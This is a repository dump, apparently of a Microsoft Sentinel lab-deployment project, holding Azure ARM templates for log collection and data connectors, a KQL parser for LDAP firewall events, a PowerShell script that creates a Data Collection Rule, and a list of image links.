16 | } 17 | } 18 | }, 19 | "resources": [ 20 | { 21 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 22 | "apiVersion": "2020-03-01-preview", 23 | "location": "[parameters('location')]", 24 | "name": "[concat(parameters('workspaceName'), '/syslogCollection')]", 25 | "kind": "LinuxSyslogCollection", 26 | "properties": { 27 | "state": "Enabled" 28 | } 29 | } 30 | ] 31 | } 32 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/threatIntelligence.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "guidValue": { 6 | "type": "string", 7 | "defaultValue": "[newGuid()]" 8 | }, 9 | "workspaceName": { 10 | "type": "string", 11 | "metadata": { 12 | "description": "Name for the Log Analytics workspace used to aggregate data" 13 | } 14 | }, 15 | "tiAlerts": { 16 | "type": "string", 17 | "metadata": { 18 | "description": "Thread Intelligence alerts state" 19 | } 20 | }, 21 | "tenantId": { 22 | "type": "string", 23 | "metadata": { 24 | "description": "Tenand Id" 25 | } 26 | }, 27 | "location": { 28 | "type": "string", 29 | "defaultValue": "[resourceGroup().location]", 30 | "metadata": { 31 | "description": "Location for all resources." 
32 | } 33 | } 34 | }, 35 | "resources": [ 36 | { 37 | "type": "Microsoft.OperationalInsights/workspaces/providers/dataConnectors", 38 | "apiVersion": "2019-01-01-preview", 39 | "location": "[parameters('location')]", 40 | "name": "[concat(parameters('workspaceName'),'/Microsoft.SecurityInsights/',parameters('guidValue'))]", 41 | "kind": "ThreatIntelligence", 42 | "properties": { 43 | "tenantId": "[parameters('tenantId')]", 44 | "dataTypes": { 45 | "indicators": { 46 | "state": "[parameters('tiAlerts')]" 47 | } 48 | } 49 | } 50 | } 51 | ] 52 | } 53 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/data-connectors/windowsFirewall.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "workspaceId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Log Analytics workspace ID" 15 | } 16 | }, 17 | "location": { 18 | "type": "string", 19 | "defaultValue": "[resourceGroup().location]", 20 | "metadata": { 21 | "description": "Location for all resources." 
22 | } 23 | } 24 | }, 25 | "resources": [ 26 | { 27 | "type": "Microsoft.OperationsManagement/solutions", 28 | "apiVersion": "2015-11-01-preview", 29 | "name": "[concat('WindowsFirewall','(', parameters('workspaceName'),')')]", 30 | "location": "[parameters('location')]", 31 | "plan": { 32 | "name": "[concat('WindowsFirewall','(', parameters('workspaceName'),')')]", 33 | "promotionCode": "", 34 | "product": "OMSGallery/WindowsFirewall", 35 | "publisher": "Microsoft" 36 | }, 37 | "properties": { 38 | "workspaceResourceId": "[parameters('workspaceId')]", 39 | "containedResources": [] 40 | } 41 | } 42 | ] 43 | } 44 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/log-analytics/additionalSolutions.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "http://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "solutionTypes": { 6 | "defaultValue": [], 7 | "type": "Array", 8 | "metadata": { 9 | "description": "Log Analytics Workspace solutions. 
Example: [\"VMInsights\"]" 10 | } 11 | }, 12 | "workspaceName": { 13 | "type": "string", 14 | "metadata": { 15 | "description": "Name for the Log Analytics workspace used to aggregate data" 16 | } 17 | }, 18 | "workspaceId": { 19 | "type": "string", 20 | "metadata": { 21 | "description": "Log Analytics workspace ID" 22 | } 23 | }, 24 | "location": { 25 | "defaultValue": "[resourceGroup().location]", 26 | "type": "String" 27 | } 28 | }, 29 | "resources": [ 30 | { 31 | "type": "Microsoft.OperationsManagement/solutions", 32 | "apiVersion": "2015-11-01-preview", 33 | "name": "[Concat(parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]", 34 | "location": "[parameters('location')]", 35 | "copy": { 36 | "name": "solutionsCopy", 37 | "count": "[length(parameters('solutionTypes'))]" 38 | }, 39 | "properties": { 40 | "workspaceResourceId": "[parameters('workspaceId')]" 41 | }, 42 | "plan": { 43 | "name": "[Concat(parameters('solutionTypes')[copyIndex()], '(', parameters('workspaceName'), ')')]", 44 | "product": "[Concat('OMSGallery/', parameters('solutionTypes')[copyIndex()])]", 45 | "promotionCode": "", 46 | "publisher": "Microsoft" 47 | } 48 | } 49 | ] 50 | } 51 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/log-analytics/iisLogsDataSource.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "location": { 12 | "type": "string", 13 | "defaultValue": "[resourceGroup().location]", 14 | "metadata": { 15 | "description": "Location for all resources." 
16 | } 17 | } 18 | }, 19 | "resources": [ 20 | { 21 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 22 | "apiVersion": "2020-08-01", 23 | "location": "[parameters('location')]", 24 | "name": "[concat(parameters('workspaceName'), '/IISLogs')]", 25 | "kind": "IISLogs", 26 | "properties": { 27 | "state": "OnPremiseEnabled" 28 | } 29 | } 30 | ] 31 | } 32 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/log-analytics/syslogDataSources.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "syslogFacilities": { 12 | "type": "array", 13 | "defaultValue": [ 14 | "auth", 15 | "authpriv", 16 | "cron", 17 | "daemon", 18 | "ftp", 19 | "kern", 20 | "user" 21 | ], 22 | "metadata": { 23 | "description": "A list of facilities to collect from Syslog." 24 | } 25 | }, 26 | "location": { 27 | "type": "string", 28 | "defaultValue": "[resourceGroup().location]", 29 | "metadata": { 30 | "description": "Location for all resources." 
31 | } 32 | } 33 | }, 34 | "resources": [ 35 | { 36 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 37 | "apiVersion": "2020-08-01", 38 | "location": "[parameters('location')]", 39 | "name": "[concat(parameters('workspaceName'), '/syslog', copyindex())]", 40 | "copy": { 41 | "name": "linuxEventCopy", 42 | "count": "[length(parameters('syslogFacilities'))]" 43 | }, 44 | "kind": "LinuxSyslog", 45 | "properties": { 46 | "sysLogName": "[trim(parameters('syslogFacilities')[copyIndex()])]", 47 | "syslogSeverities": [ 48 | { 49 | "severity": "emerg" 50 | }, 51 | { 52 | "severity": "alert" 53 | }, 54 | { 55 | "severity": "crit" 56 | }, 57 | { 58 | "severity": "err" 59 | }, 60 | { 61 | "severity": "warning" 62 | }, 63 | { 64 | "severity": "notice" 65 | }, 66 | { 67 | "severity": "info" 68 | }, 69 | { 70 | "severity": "debug" 71 | } 72 | ] 73 | } 74 | } 75 | ] 76 | } 77 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/log-analytics/winDataSources.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "winEventProviders": { 12 | "type": "array", 13 | "defaultValue": [ 14 | "System", 15 | "Microsoft-Windows-Sysmon/Operational", 16 | "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational", 17 | "Microsoft-Windows-Bits-Client/Operational", 18 | "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational", 19 | "Directory Service", 20 | "Microsoft-Windows-DNS-Client/Operational", 21 | "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall", 22 | "Windows PowerShell", 23 | 
"Microsoft-Windows-PowerShell/Operational", 24 | "Microsoft-Windows-WMI-Activity/Operational", 25 | "Microsoft-Windows-TaskScheduler/Operational" 26 | ], 27 | "metadata": { 28 | "description": "A list of Windows Event Providers that you would like to collect. Windows Security Auditing is not enabled through this option. It is enabled through Microsoft Sentinel Data Connectors." 29 | } 30 | }, 31 | "location": { 32 | "type": "string", 33 | "defaultValue": "[resourceGroup().location]", 34 | "metadata": { 35 | "description": "Location for all resources." 36 | } 37 | } 38 | }, 39 | "resources": [ 40 | { 41 | "type": "Microsoft.OperationalInsights/workspaces/dataSources", 42 | "apiVersion": "2020-08-01", 43 | "location": "[parameters('location')]", 44 | "name": "[concat(parameters('workspaceName'), '/winEvent', copyindex())]", 45 | "copy": { 46 | "name": "winEventCopy", 47 | "count": "[length(parameters('winEventProviders'))]" 48 | }, 49 | "kind": "WindowsEvent", 50 | "properties": { 51 | "eventLogName": "[trim(parameters('winEventProviders')[copyIndex()])]", 52 | "eventTypes": [ 53 | { 54 | "eventType": "Error" 55 | }, 56 | { 57 | "eventType": "Warning" 58 | }, 59 | { 60 | "eventType": "Information" 61 | } 62 | ] 63 | } 64 | } 65 | ] 66 | } 67 | -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/parsers/winLDAPFWLogs.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-08-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string" 7 | }, 8 | "location": { 9 | "type": "string" 10 | } 11 | }, 12 | "resources": [ 13 | { 14 | "type": "Microsoft.OperationalInsights/workspaces", 15 | "apiVersion": "2017-03-15-preview", 16 | "name": "[parameters('workspaceName')]", 17 | "location": "[parameters('location')]", 18 | "resources": [ 19 | { 20 | 
"type": "savedSearches", 21 | "apiVersion": "2020-08-01", 22 | "name": "LDAPFWWMicrosoftWindowsEvent", 23 | "dependsOn": [ 24 | "[concat('Microsoft.OperationalInsights/workspaces/', parameters('workspaceName'))]" 25 | ], 26 | "properties": { 27 | "etag": "*", 28 | "displayName": "Windows LDAP Firewall Parser", 29 | "category": "Security", 30 | "FunctionAlias": "winLDAPFWLogs", 31 | "query": "// KQL LDAPFW parser 32 | // Contributors: Roberto Rodriguez @Cyb3rWard0g MSTIC 33 | // Modifed: 2023/03/24 34 | WindowsEvent 35 | | where Channel == 'LDAPFW' 36 | | where EventID == 263 37 | | extend ParsedEventData = parse_xml(EventData) 38 | | extend user_name = tostring(ParsedEventData.[\"01\"]) 39 | | extend action = tostring(ParsedEventData.[\"02\"]) 40 | | extend base_dn = tostring(ParsedEventData.[\"03\"]) 41 | | extend ldap_filter = tostring(ParsedEventData.[\"04\"]) 42 | | extend scope = tostring(ParsedEventData.[\"05\"]) 43 | | extend attributes = tostring(ParsedEventData.[\"06\"]) 44 | | extend client_network_address = tostring(ParsedEventData.[\"07\"]) 45 | | extend client_port = tostring(ParsedEventData.[\"08\"]) 46 | | project-away EventData, ParsedEventData", 47 | "version": 1 48 | } 49 | } 50 | ] 51 | } 52 | ] 53 | } -------------------------------------------------------------------------------- /microsoft-sentinel/linkedtemplates/security-center/winSecurityAuditing.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", 3 | "contentVersion": "1.0.0.0", 4 | "parameters": { 5 | "workspaceName": { 6 | "type": "string", 7 | "metadata": { 8 | "description": "Name for the Log Analytics workspace used to aggregate data" 9 | } 10 | }, 11 | "workspaceId": { 12 | "type": "string", 13 | "metadata": { 14 | "description": "Log Analytics workspace ID" 15 | } 16 | }, 17 | "securityCollectionTier": { 18 | "type": "string", 19 | "metadata": { 
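"description": "Tier for gathering Windows Security Events."
}
},
"location": {
"type": "string",
"metadata": {
"description": "Location for all resources."
}
}
},
"resources": [
{
"name": "[concat('Security','(', parameters('workspaceName'),')')]",
"type": "Microsoft.OperationsManagement/solutions",
"apiVersion": "2015-11-01-preview",
"location":"[parameters('location')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceId')]"
},
"plan": {
"name": "[concat('Security','(', parameters('workspaceName'),')')]",
"product": "OMSGallery/Security",
"publisher": "Microsoft",
"promotionCode": ""
}
},
{
"type": "Microsoft.OperationalInsights/workspaces/dataSources",
"apiVersion": "2015-11-01-preview",
"location": "[parameters('location')]",
"dependsOn": [
"[resourceId('Microsoft.OperationsManagement/solutions/', concat('Security','(', parameters('workspaceName'),')'))]"
],
"name": "[concat(parameters('workspaceName'), '/', 'SecurityEventCollectionConfiguration')]",
"kind": "SecurityEventCollectionConfiguration",
"properties": {
"tier": "[parameters('securityCollectionTier')]",
"tierSetMethod": "Custom"
}
}
]
}
--------------------------------------------------------------------------------
/microsoft-sentinel/scripts/Create-DataCollectionRules.ps1:
--------------------------------------------------------------------------------
# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPLv3
# Reference:
# https://review.docs.microsoft.com/en-us/azure/sentinel/connect-windows-security-events?branch=pr-en-us-161325&tabs=AMA
# https://docs.microsoft.com/en-us/rest/api/monitor/data-collection-rules/create#knowndatacollectionruleresourcekind
#
# Creates (HTTP PUT) an Azure Monitor Data Collection Rule (DCR) whose single
# logAnalytics destination is the given workspace. The rule's 'dataSources'
# block is supplied either as an object (-DataSourcesObject) or as a JSON file
# (-DataSourcesFile), which may be a local path or an http(s) URL.
#
# Parameters:
#   WorkspaceId / WorkspaceResourceId - destination Log Analytics workspace.
#   ResourceGroup, DataCollectionRuleName, Location - where the DCR is created.
#   Kind                        - DCR kind, 'Windows' (default) or 'Linux'.
#   DestinationLogAnalyticsName - name of the logAnalytics destination inside the rule.
#   DataFlowsStreams            - streams routed to that destination
#                                 (default: Microsoft-SecurityEvent).
#   DataSourcesObject           - pre-built 'dataSources' object for the rule.
#   DataSourcesFile             - JSON file (local path or http/https URL) holding it;
#                                 when given it overrides DataSourcesObject.
# Output: the resource id of the created rule. It is also stored in
#   $DeploymentScriptOutputs['text'], which is how an ARM deploymentScripts
#   resource collects script output.
# Requires the Az PowerShell module (Get-AzContext, Connect-AzAccount, Invoke-AzRestMethod).

param(
    [Parameter(Mandatory=$true)][string]$WorkspaceId,
    [Parameter(Mandatory=$true)][string]$WorkspaceResourceId,
    [Parameter(Mandatory=$true)][string]$ResourceGroup,
    [Parameter(Mandatory=$false)][ValidateSet('Windows','Linux')][string]$Kind = 'Windows',
    [Parameter(Mandatory=$true)][string]$DataCollectionRuleName,
    [Parameter(Mandatory=$false)][string]$DestinationLogAnalyticsName = 'WindowsEvents',
    [Parameter(Mandatory=$false)][string[]]$DataFlowsStreams = @('Microsoft-SecurityEvent'),
    [Parameter(Mandatory=$false)][object]$DataSourcesObject,
    [Parameter(Mandatory=$false)][string]$DataSourcesFile,
    [Parameter(Mandatory=$true)][string]$Location
)

# Reuse an existing Az session; prompt for login only when there is none.
$context = Get-AzContext

if(!$context){
    Connect-AzAccount
    $context = Get-AzContext
}

$SubscriptionId = $context.Subscription.Id

Write-host "[+] Connected to Azure with subscription: $($context.Subscription)"
Write-host "[+] Processing XPath Queries.."
if ($DataSourcesFile){
    # Only http(s) URLs are downloaded. A plain '-as [System.URI]' test also
    # matches Windows absolute paths (file:// URIs), so the scheme is checked
    # explicitly; anything else is treated as a local file.
    $sourceUri = $DataSourcesFile -as [System.Uri]
    if ($sourceUri -and $sourceUri.AbsoluteUri -and ($sourceUri.Scheme -in @('http','https'))) {
        Write-host "[+] Downloading Data Sources File.."
        # Windows PowerShell 5.1 may negotiate an older TLS version by default; force TLS 1.2.
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
        # Save under the URL's leaf name inside the current PowerShell location.
        # (The original referenced an undefined $XPathQueriesUrl here and in the
        # download call, so the remote path never worked.)
        $OutputFile = Join-Path (Get-Location -PSProvider FileSystem).ProviderPath (Split-Path $sourceUri.AbsolutePath -Leaf)
        Invoke-WebRequest -Uri $sourceUri.AbsoluteUri -OutFile $OutputFile -UseBasicParsing
        $DataSourcesFile = $OutputFile
    }
    # Use the path as given; the original prefixed '.\', which broke absolute paths.
    $DataSourcesObject = Get-Content -Path $DataSourcesFile -Raw | ConvertFrom-Json
}

# The API rejects a rule without data sources; fail early with a clear message
# instead of after several retries.
if (-not $DataSourcesObject) {
    throw "No data sources supplied. Provide -DataSourcesObject or -DataSourcesFile."
}

Write-host "[+] Data Collection Rule: $DataCollectionRuleName"
$ApiUri = "/subscriptions/${SubscriptionId}/resourceGroups/${ResourceGroup}/providers/Microsoft.Insights/dataCollectionRules/${DataCollectionRuleName}?api-version=2019-11-01-preview"
$RuleBody = @{
    location = $Location
    kind = "$Kind"
    tags = @{
        createdBy = "Sentinel"
    }
    properties = @{
        datasources = $DataSourcesObject
        destinations = @{
            logAnalytics = @(
                @{
                    name = "$DestinationLogAnalyticsName"
                    workspaceId = $WorkspaceId
                    workspaceResourceId = $WorkspaceResourceId
                }
            )
        }
        dataFlows = @(
            @{
                streams = $DataFlowsStreams
                destinations = @(
                    "$DestinationLogAnalyticsName"
                )
            }
        )
    }
} | ConvertTo-Json -Depth 10

Write-host "[+] Creating Data Collection Rule: $DataCollectionRuleName"
# Retry the PUT (transport errors and non-2xx responses alike) with a fixed
# 15 second delay; the loop gives up once more than 5 retries have been made.
$stopLoop = $false
[int]$retryCount = 0
do {
    try{
        Write-Verbose $RuleBody
        $response = Invoke-AzRestMethod -Path $ApiUri -Method PUT -Payload $RuleBody
        $responseCode = $response.StatusCode
        Write-Verbose "HTTP $responseCode : $($response.Content)"
        if ($responseCode -eq 201 -or $responseCode -eq 200) {
            $responseDescription = Switch ($responseCode) {
                200 { 'Rule: OK, Operation successfully completed' }
                201 { 'Rule: Created' }
            }
            write-host " [+] $DataCollectionRuleName $responseDescription"
            # Content is the JSON body of the created/updated rule; return its resource id.
            $output = $response.Content | ConvertFrom-Json | Select-Object -ExpandProperty id
            Write-Output $output
            $DeploymentScriptOutputs = @{}
            $DeploymentScriptOutputs['text'] = $output
            $stopLoop = $true
        }
        else {
            # Include status code and body so the final error message is readable;
            # the original threw the whole response object.
            throw "HTTP $responseCode : $($response.Content)"
        }
    }
    catch {
        if ($retryCount -gt 5){
            Write-Verbose $_
            Write-Error "Unable to create data collection rule with error message: $($_.Exception.Message)" -ErrorAction Stop
            $stopLoop = $true
        }
        else {
            Write-host "[*] Could not create data collection rule, retrying in 15 seconds.."
            Start-Sleep -seconds 15
            $retryCount = $retryCount + 1
        }
    }
}
while ($stopLoop -eq $false)
--------------------------------------------------------------------------------
/resources/images/cef-log-analytics-agent_01_azure_sentinel.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_01_azure_sentinel.PNG
--------------------------------------------------------------------------------
/resources/images/cef-log-analytics-agent_02_cef_data_connector.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_02_cef_data_connector.PNG
--------------------------------------------------------------------------------
/resources/images/cef-log-analytics-agent_03_sample_cef_event.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_03_sample_cef_event.PNG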
-------------------------------------------------------------------------------- /resources/images/cef-log-analytics-agent_04_cef_azure_bastion.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_04_cef_azure_bastion.png -------------------------------------------------------------------------------- /resources/images/cef-log-analytics-agent_05_custom_cef_event.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/cef-log-analytics-agent_05_custom_cef_event.PNG -------------------------------------------------------------------------------- /resources/images/lab_environment_omigod.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/lab_environment_omigod.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-azure-sentinel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-azure-sentinel.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-service-status.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-service-status.png -------------------------------------------------------------------------------- 
/resources/images/linux-sysmon-tail-syslog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-tail-syslog.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-tail-sysmonlogview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-tail-sysmonlogview.png -------------------------------------------------------------------------------- /resources/images/linux-sysmon-template-params.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/linux-sysmon-template-params.png -------------------------------------------------------------------------------- /resources/images/log4jshell-deployment-resources.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-deployment-resources.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-reverseshell-pcap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-reverseshell-pcap.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-reverseshell3.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-reverseshell3.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-reverseshell4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-reverseshell4.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-sentinel-file-creation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-sentinel-file-creation.png -------------------------------------------------------------------------------- /resources/images/log4jshell-trigger-rce-basicjar-sysmon-process-create.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-trigger-rce-basicjar-sysmon-process-create.png -------------------------------------------------------------------------------- /resources/images/log4jshell-validate-sysmon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/log4jshell-validate-sysmon.png -------------------------------------------------------------------------------- /resources/images/logo.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/logo.png -------------------------------------------------------------------------------- /resources/images/logo2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/logo2.png -------------------------------------------------------------------------------- /resources/images/oms_scx_verbose_logging.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/oms_scx_verbose_logging.png -------------------------------------------------------------------------------- /resources/images/sysmon-azure-sentinel-query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/sysmon-azure-sentinel-query.png -------------------------------------------------------------------------------- /resources/images/sysmon-azure-sentinel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/sysmon-azure-sentinel.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_01_exchange_admin_center_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_01_exchange_admin_center_login.png 
-------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_02_exchange_admin_center_portal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_02_exchange_admin_center_portal.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_03_owa_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_03_owa_login.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_04_owa_inbox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_04_owa_inbox.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_05_owa_new_message.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_05_owa_new_message.png -------------------------------------------------------------------------------- /resources/images/win10-ad-mxs_06_owa_message_received.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ad-mxs_06_owa_message_received.png -------------------------------------------------------------------------------- 
/resources/images/win10-ldapfw_check_events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ldapfw_check_events.png -------------------------------------------------------------------------------- /resources/images/win10-ldapfw_query_ldap_firewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-ldapfw_query_ldap_firewall.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_block_replication.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_block_replication.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_block_replication_event.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_block_replication_event.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_check_events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_check_events.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_check_mssentinel.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_check_mssentinel.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_forwarded_events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_forwarded_events.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_mk_dcsync.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/OTRF/Microsoft-Sentinel2Go/cedd0ace0c48b4ac409777a0623b1ab7fee36db5/resources/images/win10-rpcfw_mk_dcsync.png -------------------------------------------------------------------------------- /resources/images/win10-rpcfw_mk_dcsync_execution.png: -------------------------------------------------------------------------------- 